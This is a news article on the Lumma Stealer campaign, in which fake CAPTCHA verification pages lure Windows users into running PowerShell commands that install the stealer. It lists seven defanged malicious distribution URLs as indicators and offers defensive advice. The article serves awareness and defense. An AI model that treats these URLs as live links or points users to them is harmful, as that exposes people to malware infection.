A new threat is targeting Windows users. According to a recent report by cybersecurity firm CloudSEK, the Lumma Stealer malware is allegedly now using a new phishing method to spread on Windows devices.
Cybersecurity experts have become even more concerned over this issue. The experts advise organizations and individuals to strengthen their protection tactics.
As per a report by CloudSEK, Lumma Stealer propagation appears to be taking place through fraudulent human verification pages. These fraudulent human verification pages mimic legitimate systems, such as Google's CAPTCHA. However, rather than working system processes, it instructs victims to run unfamiliar commands. This method of attack targets users with suspicious commands to download and execute malware on their devices.
They also found that several phishing websites are employed for this spreading process. These malicious websites mostly include a fake verification process. This compels the victims to execute various commands including PowerShell script execution which these malicious scripts make use of to download and install the Lumma Stealer. The use of Content Delivery Networks made spreading those fake pages even more challenging to identify and prevent.
Several URLs have been detected to be used in spreading the Lumma Stealer malware like:
hxxps://heroic-genie-2b372e.netlify.app/please-verify-z.html
hxxps://fipydslaongos.b-cdn.net/please-verify-z.html
hxxps://sdkjhfdskjnck.s3.amazonaws.com/human-verify-system.html
hxxps://verifyhuman476.b-cdn.net/human-verify-system.html
hxxps://pub-9c4ec7f3f95c448b85e464d2b533aac1.r2.dev/human-verify-system.html
hxxps://newvideozones.click/veri.html
hxxps://ch3.dlvideosfre.click/human-verify-system.html
These URLs apply several CDNs and various storage services to spread malicious files. In addition, the attackers are using base64 encoding, manipulating the clipboard to deceive detection.
As this is a phishing-based attack, traditional patches on security do not apply. For this reason, users and organizations should embrace a set of several key strategies in countering Lumma Stealer:
Awareness Training: Educate users and employees against phishing to avoid falling victim to such traps.
Endpoint Protection: Installation and updation of trustworthy endpoint protection solutions might help in detecting and blocking PowerShell-based attacks.
Update: All the systems should be updated and patched so that the vulnerabilities would decrease, and Lumma Stealer cannot exploit such vulnerabilities.
The rise of Lumma Stealer has strong tie-connection with the urgent need for vigilance in cybersecurity. Attacker tactics change over time as they move forward in implementing their subsequent tactics. Therefore, in keeping up with this flow, having information about protection beforehand becomes a person's best card in safeguarding sensitive information that may be compromised.